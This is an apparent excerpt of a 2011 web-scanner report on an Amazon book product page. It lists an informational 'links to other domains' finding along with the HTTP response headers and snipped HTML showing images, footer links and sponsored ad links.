<a href="http://www.amazon.com/Microsoft-Silverlight-Step/dp/073563887X/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_073563887X" ><img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Microsoft Silverlight 4 Step by Step (Step By Step (Microsoft))" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Foundation-Expression-Blend-4-Silverlight/dp/143022973X/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_143022973X" ><img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg" width="50" alt="Foundation Expression Blend 4 with Silverlight" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/178-7471219-5935264"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.375. http://www.amazon.com/gp/product/184968006X previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/184968006X

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/41kH6+drJKL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51gaT-e4LjL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL75_SS50_.jpg
http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51yNm0-0X1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AB61b.sXYJbxeWIJELbZnZESLuA-XNUTx68MRbKXHzkfU9f3vMxh.8nowYKcRH0LEEodBduTSJ-sUU0LUszCDrNUtP0fUiDLeVgYIp2GqS8QCuyxD4fOe7nqUePAPEUJMQFfD.BP6Ky0CjrqjbhLoyZmsWwh0AgklsJmnw34UP50OiZOOpiBWC6GT5QF24QqhICdGxLDetUw-TBCU6mlWTmhJSkiKinGh37xU8DzrLj1nCPoLm-qm2inFeOHDhCfm5A4CsHnG8yWa6-YInoVJT9oHQmU7L8YQkcROlVofXo0a5rqZCPf5KMkrnHxlEqGiOGOLm2ful22zvfKpMNVgEE9J9uGzfQwWykj362LcVNZO5d5XXULhzW.yt9MfIMhXNhHDQkmIaGDGZtiz-cnMWvlCfegN084.q6IiRK4bFpkO2GEjUvfYoiV.AjDR8vFfEEu5OG4urRmSewijVG0XOJ2ldT.NXD08AHGpVqrY2A3Yz.7UhBsa-XCdbojgAopG.t0i0tlYJ2O&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AJAPTFXtd2ytU8-C3BCqIn5nVG4PqakXovUXy0SEIgBme8uiD9zCrBiiAUoYZNnjhtIoHU7eYs6fIvK92XFvGPMX8gEy.Fqwl0id7PiMkpAzY9w0-dVyVcyNd.TBRxIxb3BWp-o7-VDZNGpeob-jpteaoc6XZ6wYhF-sOvDHNGSDRpQVuJA0BSwTCg49gIut9GC6m4ek1HJ5CsNTzAUrQs16rZZDyXezq12UmHIQzoNoXGb2.mDmWcgFogGKH9QOUD6i9XosVwhy5p4jlrpbamhxI0BK.XH7VlHKYJXAlvUxSP1dVfRb5HXfStlsgqSt7aAvkOliqAu4yqH3YvdJRwLt1e2oTxDF525Gg7.GPuNj-vg1btcWdoBngP547ewEZkTjWgruzvWxpE3iqAq3v7z-vzVa2KolU7cyPaOfaWUMpD7B7qlH2U6Vr2y8dXmumWAlDrVAWBjP3VAJzGNKXFJPV8xITT4U848cSv5tBfi99arV3tun.rvlaxUhYDZ69uolpqApuq2eYBoh.Hdf0VzN4zLLi6MJoPcJ1WzCJb48TX3lHOhyakPtQu1ouH99CX3qUK41.uPdHu4Z4AS6h1mqspA-fcerpQ__&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AMjkcXpTc-N.deHKmltxM9hVdjUnO0HHMm6vPE-ZSPMJFdAqR276O2xHTYS7l5N0SYKpLeXWq00BRNQiL0mniigtj3xUFs3kigdGOWX7NnSGm87ulimjYAAM17Xg4TAwYIj6r4HShPjyLT5J1WRkdzBKQRuGKH8e1LdkbKOSnjpYQlz.-DfDLAjt9M1QmiFhhPot2rx.nP5ocuw5SmY2YUHh4rmN5.M66zfZqWTH6Dp5HjVmGssM-VintWmYgd6BiXCZaZavf9J1CZ4xcofpew108T4WVpwBSGLEdwW4Zo4F2rL.WhzWbMCOcgXnMoIZMukHKu7eN8dopWcK5MN4SxO0kNz798oB-SL4uOtgEjITiKSSLTtLzAL5QPq90vtB-CkB5Pd40RhdmWa9qi.fbpWoAZ8OtNWBeHJLVwCaYYDn01WnpbBjhzAQJnBFxjob5Q__&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:20 GMT
Server: Server
x-amz-id-1: 0XKECKNR6H60A6C1P2PC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: CcVgt8Ki3aGDcInLSZrXm3lZNlBFSwvoguF5oYlAkL7M50lOj+5ROXGiGrpYAFMx
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT
Content-Length: 400270

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=184968006X"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/184968006X/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" onmouseover="" /></a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB61b.sXYJbxeWIJELbZnZESLuA-XNUTx68MRbKXHzkfU9f3vMxh.8nowYKcRH0LEEodBduTSJ-sUU0LUszCDrNUtP0fUiDLeVgYIp2GqS8QCuyxD4fOe7nqUePAPEUJMQFfD.BP6Ky0CjrqjbhLoyZmsWwh0AgklsJmnw34UP50OiZOOpiBWC6GT5QF24QqhICdGxLDetUw-TBCU6mlWTmhJSkiKinGh37xU8DzrLj1nCPoLm-qm2inFeOHDhCfm5A4CsHnG8yWa6-YInoVJT9oHQmU7L8YQkcROlVofXo0a5rqZCPf5KMkrnHxlEqGiOGOLm2ful22zvfKpMNVgEE9J9uGzfQwWykj362LcVNZO5d5XXULhzW.yt9MfIMhXNhHDQkmIaGDGZtiz-cnMWvlCfegN084.q6IiRK4bFpkO2GEjUvfYoiV.AjDR8vFfEEu5OG4urRmSewijVG0XOJ2ldT.NXD08AHGpVqrY2A3Yz.7UhBsa-XCdbojgAopG.t0i0tlYJ2O&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB61b.sXYJbxeWIJELbZnZESLuA-XNUTx68MRbKXHzkfU9f3vMxh.8nowYKcRH0LEEodBduTSJ-sUU0LUszCDrNUtP0fUiDLeVgYIp2GqS8QCuyxD4fOe7nqUePAPEUJMQFfD.BP6Ky0CjrqjbhLoyZmsWwh0AgklsJmnw34UP50OiZOOpiBWC6GT5QF24QqhICdGxLDetUw-TBCU6mlWTmhJSkiKinGh37xU8DzrLj1nCPoLm-qm2inFeOHDhCfm5A4CsHnG8yWa6-YInoVJT9oHQmU7L8YQkcROlVofXo0a5rqZCPf5KMkrnHxlEqGiOGOLm2ful22zvfKpMNVgEE9J9uGzfQwWykj362LcVNZO5d5XXULhzW.yt9MfIMhXNhHDQkmIaGDGZtiz-cnMWvlCfegN084.q6IiRK4bFpkO2GEjUvfYoiV.AjDR8vFfEEu5OG4urRmSewijVG0XOJ2ldT.NXD08AHGpVqrY2A3Yz.7UhBsa-XCdbojgAopG.t0i0tlYJ2O&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB61b.sXYJbxeWIJELbZnZESLuA-XNUTx68MRbKXHzkfU9f3vMxh.8nowYKcRH0LEEodBduTSJ-sUU0LUszCDrNUtP0fUiDLeVgYIp2GqS8QCuyxD4fOe7nqUePAPEUJMQFfD.BP6Ky0CjrqjbhLoyZmsWwh0AgklsJmnw34UP50OiZOOpiBWC6GT5QF24QqhICdGxLDetUw-TBCU6mlWTmhJSkiKinGh37xU8DzrLj1nCPoLm-qm2inFeOHDhCfm5A4CsHnG8yWa6-YInoVJT9oHQmU7L8YQkcROlVofXo0a5rqZCPf5KMkrnHxlEqGiOGOLm2ful22zvfKpMNVgEE9J9uGzfQwWykj362LcVNZO5d5XXULhzW.yt9MfIMhXNhHDQkmIaGDGZtiz-cnMWvlCfegN084.q6IiRK4bFpkO2GEjUvfYoiV.AjDR8vFfEEu5OG4urRmSewijVG0XOJ2ldT.NXD08AHGpVqrY2A3Yz.7UhBsa-XCdbojgAopG.t0i0tlYJ2O&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.trigent.com</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMjkcXpTc-N.deHKmltxM9hVdjUnO0HHMm6vPE-ZSPMJFdAqR276O2xHTYS7l5N0SYKpLeXWq00BRNQiL0mniigtj3xUFs3kigdGOWX7NnSGm87ulimjYAAM17Xg4TAwYIj6r4HShPjyLT5J1WRkdzBKQRuGKH8e1LdkbKOSnjpYQlz.-DfDLAjt9M1QmiFhhPot2rx.nP5ocuw5SmY2YUHh4rmN5.M66zfZqWTH6Dp5HjVmGssM-VintWmYgd6BiXCZaZavf9J1CZ4xcofpew108T4WVpwBSGLEdwW4Zo4F2rL.WhzWbMCOcgXnMoIZMukHKu7eN8dopWcK5MN4SxO0kNz798oB-SL4uOtgEjITiKSSLTtLzAL5QPq90vtB-CkB5Pd40RhdmWa9qi.fbpWoAZ8OtNWBeHJLVwCaYYDn01WnpbBjhzAQJnBFxjob5Q__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMjkcXpTc-N.deHKmltxM9hVdjUnO0HHMm6vPE-ZSPMJFdAqR276O2xHTYS7l5N0SYKpLeXWq00BRNQiL0mniigtj3xUFs3kigdGOWX7NnSGm87ulimjYAAM17Xg4TAwYIj6r4HShPjyLT5J1WRkdzBKQRuGKH8e1LdkbKOSnjpYQlz.-DfDLAjt9M1QmiFhhPot2rx.nP5ocuw5SmY2YUHh4rmN5.M66zfZqWTH6Dp5HjVmGssM-VintWmYgd6BiXCZaZavf9J1CZ4xcofpew108T4WVpwBSGLEdwW4Zo4F2rL.WhzWbMCOcgXnMoIZMukHKu7eN8dopWcK5MN4SxO0kNz798oB-SL4uOtgEjITiKSSLTtLzAL5QPq90vtB-CkB5Pd40RhdmWa9qi.fbpWoAZ8OtNWBeHJLVwCaYYDn01WnpbBjhzAQJnBFxjob5Q__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMjkcXpTc-N.deHKmltxM9hVdjUnO0HHMm6vPE-ZSPMJFdAqR276O2xHTYS7l5N0SYKpLeXWq00BRNQiL0mniigtj3xUFs3kigdGOWX7NnSGm87ulimjYAAM17Xg4TAwYIj6r4HShPjyLT5J1WRkdzBKQRuGKH8e1LdkbKOSnjpYQlz.-DfDLAjt9M1QmiFhhPot2rx.nP5ocuw5SmY2YUHh4rmN5.M66zfZqWTH6Dp5HjVmGssM-VintWmYgd6BiXCZaZavf9J1CZ4xcofpew108T4WVpwBSGLEdwW4Zo4F2rL.WhzWbMCOcgXnMoIZMukHKu7eN8dopWcK5MN4SxO0kNz798oB-SL4uOtgEjITiKSSLTtLzAL5QPq90vtB-CkB5Pd40RhdmWa9qi.fbpWoAZ8OtNWBeHJLVwCaYYDn01WnpbBjhzAQJnBFxjob5Q__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.appdev.com</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAPTFXtd2ytU8-C3BCqIn5nVG4PqakXovUXy0SEIgBme8uiD9zCrBiiAUoYZNnjhtIoHU7eYs6fIvK92XFvGPMX8gEy.Fqwl0id7PiMkpAzY9w0-dVyVcyNd.TBRxIxb3BWp-o7-VDZNGpeob-jpteaoc6XZ6wYhF-sOvDHNGSDRpQVuJA0BSwTCg49gIut9GC6m4ek1HJ5CsNTzAUrQs16rZZDyXezq12UmHIQzoNoXGb2.mDmWcgFogGKH9QOUD6i9XosVwhy5p4jlrpbamhxI0BK.XH7VlHKYJXAlvUxSP1dVfRb5HXfStlsgqSt7aAvkOliqAu4yqH3YvdJRwLt1e2oTxDF525Gg7.GPuNj-vg1btcWdoBngP547ewEZkTjWgruzvWxpE3iqAq3v7z-vzVa2KolU7cyPaOfaWUMpD7B7qlH2U6Vr2y8dXmumWAlDrVAWBjP3VAJzGNKXFJPV8xITT4U848cSv5tBfi99arV3tun.rvlaxUhYDZ69uolpqApuq2eYBoh.Hdf0VzN4zLLi6MJoPcJ1WzCJb48TX3lHOhyakPtQu1ouH99CX3qUK41.uPdHu4Z4AS6h1mqspA-fcerpQ__&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAPTFXtd2ytU8-C3BCqIn5nVG4PqakXovUXy0SEIgBme8uiD9zCrBiiAUoYZNnjhtIoHU7eYs6fIvK92XFvGPMX8gEy.Fqwl0id7PiMkpAzY9w0-dVyVcyNd.TBRxIxb3BWp-o7-VDZNGpeob-jpteaoc6XZ6wYhF-sOvDHNGSDRpQVuJA0BSwTCg49gIut9GC6m4ek1HJ5CsNTzAUrQs16rZZDyXezq12UmHIQzoNoXGb2.mDmWcgFogGKH9QOUD6i9XosVwhy5p4jlrpbamhxI0BK.XH7VlHKYJXAlvUxSP1dVfRb5HXfStlsgqSt7aAvkOliqAu4yqH3YvdJRwLt1e2oTxDF525Gg7.GPuNj-vg1btcWdoBngP547ewEZkTjWgruzvWxpE3iqAq3v7z-vzVa2KolU7cyPaOfaWUMpD7B7qlH2U6Vr2y8dXmumWAlDrVAWBjP3VAJzGNKXFJPV8xITT4U848cSv5tBfi99arV3tun.rvlaxUhYDZ69uolpqApuq2eYBoh.Hdf0VzN4zLLi6MJoPcJ1WzCJb48TX3lHOhyakPtQu1ouH99CX3qUK41.uPdHu4Z4AS6h1mqspA-fcerpQ__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJAPTFXtd2ytU8-C3BCqIn5nVG4PqakXovUXy0SEIgBme8uiD9zCrBiiAUoYZNnjhtIoHU7eYs6fIvK92XFvGPMX8gEy.Fqwl0id7PiMkpAzY9w0-dVyVcyNd.TBRxIxb3BWp-o7-VDZNGpeob-jpteaoc6XZ6wYhF-sOvDHNGSDRpQVuJA0BSwTCg49gIut9GC6m4ek1HJ5CsNTzAUrQs16rZZDyXezq12UmHIQzoNoXGb2.mDmWcgFogGKH9QOUD6i9XosVwhy5p4jlrpbamhxI0BK.XH7VlHKYJXAlvUxSP1dVfRb5HXfStlsgqSt7aAvkOliqAu4yqH3YvdJRwLt1e2oTxDF525Gg7.GPuNj-vg1btcWdoBngP547ewEZkTjWgruzvWxpE3iqAq3v7z-vzVa2KolU7cyPaOfaWUMpD7B7qlH2U6Vr2y8dXmumWAlDrVAWBjP3VAJzGNKXFJPV8xITT4U848cSv5tBfi99arV3tun.rvlaxUhYDZ69uolpqApuq2eYBoh.Hdf0VzN4zLLi6MJoPcJ1WzCJb48TX3lHOhyakPtQu1ouH99CX3qUK41.uPdHu4Z4AS6h1mqspA-fcerpQ__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.networkautomation.com</a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-SharePoint-2010-Integration/dp/184968006X/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/SharePoint-Development-Visual-Studio-Microsoft/dp/0321718313/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="SharePoint 2010 Development with Visual Studio 2010 (Microsoft .NET Development Series)" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-SharePoint-2010-Solutions-Professionals/dp/1430228652/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft SharePoint 2010: Building Solutions for SharePoint 2010 (Books for Professionals by Professionals)" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41kH6%2BdrJKL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51gaT-e4LjL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
